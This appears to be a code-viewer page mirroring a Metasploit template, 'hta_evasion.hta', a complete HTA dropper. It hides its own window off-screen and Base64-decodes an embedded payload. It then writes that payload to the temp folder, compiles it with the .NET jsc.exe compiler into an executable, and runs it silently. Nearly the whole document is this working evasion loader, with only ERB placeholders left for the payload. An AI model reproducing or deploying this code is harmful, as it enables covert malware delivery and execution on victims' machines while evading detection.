Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

hta_evasion.hta 3.8KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151
  1. <html>
  2. <head>
  3. <HTA:APPLICATION WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" />
  4. </head>
  5. </html>
  6. <script>
  7. window.resizeTo(1, 1);
  8. window.moveTo(-2000, -2000);
  9. // Base64 implementation found on http://www.webtoolkit.info/javascript-base64.html
  10. // variable names changed to make obfuscation easier
  11. var Base64 = {
  12. // private property
  13. _keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
  14. // public method for decoding
  15. decode : function (input) {
  16. var output = "";
  17. var chr1, chr2, chr3;
  18. var enc1, enc2, enc3, enc4;
  19. var i = 0;
  20. input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, "");
  21. while (i < input.length) {
  22. enc1 = this._keyStr.indexOf(input.charAt(i++));
  23. enc2 = this._keyStr.indexOf(input.charAt(i++));
  24. enc3 = this._keyStr.indexOf(input.charAt(i++));
  25. enc4 = this._keyStr.indexOf(input.charAt(i++));
  26. chr1 = (enc1 << 2) | (enc2 >> 4);
  27. chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
  28. chr3 = ((enc3 & 3) << 6) | enc4;
  29. output = output + String.fromCharCode(chr1);
  30. if (enc3 != 64) {
  31. output = output + String.fromCharCode(chr2);
  32. }
  33. if (enc4 != 64) {
  34. output = output + String.fromCharCode(chr3);
  35. }
  36. }
  37. output = Base64._utf8_decode(output);
  38. return output;
  39. },
  40. _utf8_decode : function (utftext) {
  41. var string = "";
  42. var input_idx = 0;
  43. var chr1 = 0;
  44. var chr2 = 0;
  45. var chr3 = 0;
  46. while ( input_idx < utftext.length ) {
  47. chr1 = utftext.charCodeAt(input_idx);
  48. if (chr1 < 128) {
  49. string += String.fromCharCode(chr1);
  50. input_idx++;
  51. }
  52. else if((chr1 > 191) && (chr1 < 224)) {
  53. chr2 = utftext.charCodeAt(input_idx+1);
  54. string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
  55. input_idx += 2;
  56. } else {
  57. chr2 = utftext.charCodeAt(input_idx+1);
  58. chr3 = utftext.charCodeAt(input_idx+2);
  59. string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
  60. input_idx += 3;
  61. }
  62. }
  63. return string;
  64. }
  65. };
  66. decodedStr = Base64.decode("<%= jsnet_encoded %>");
  67. function getTempPath()
  68. {
  69. var TemporaryFolder = 2;
  70. var fso = new ActiveXObject("Scripting.FileSystemObject");
  71. var tempPath = fso.GetSpecialFolder(TemporaryFolder);
  72. return tempPath;
  73. }
  74. var path = getTempPath();
  75. function makefile()
  76. {
  77. var fso = new ActiveXObject("Scripting.FileSystemObject");
  78. var thefile = fso.CreateTextFile(path + "\\\\<%= fname %>.js", true);
  79. thefile.WriteLine(decodedStr);
  80. thefile.Close();
  81. }
  82. makefile();
  83. function findJSC()
  84. {
  85. var fso = new ActiveXObject("Scripting.FileSystemObject");
  86. var comPath = "C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\";
  87. var jscPath = "";
  88. if(!fso.FolderExists(comPath))
  89. {
  90. return false;
  91. }
  92. var frameFolder = fso.GetFolder(comPath);
  93. var fEnum = new Enumerator(frameFolder.SubFolders);
  94. while(!fEnum.atEnd())
  95. {
  96. jscPath = fEnum.item().Path;
  97. if(fso.FileExists(jscPath + "\\\\jsc.exe"))
  98. {
  99. return jscPath + "\\\\jsc.exe";
  100. }
  101. fEnum.moveNext();
  102. }
  103. return false;
  104. }
  105. var comPath = findJSC();
  106. if(comPath)
  107. {
  108. var fso = new ActiveXObject("Scripting.FileSystemObject");
  109. var objShell = new ActiveXObject("WScript.shell");
  110. var js_f = path + "\\\\<%= fname %>.js";
  111. var ex = path + "\\\\<%= fname %>.exe";
  112. var platform = "/platform:<%= arch %>";
  113. objShell.run(comPath + " /out:" + ex + " " + platform + " /t:winexe "+ js_f, 0);
  114. while(!fso.FileExists(ex)) { }
  115. objShell.run(ex, 0);
  116. }
  117. </script>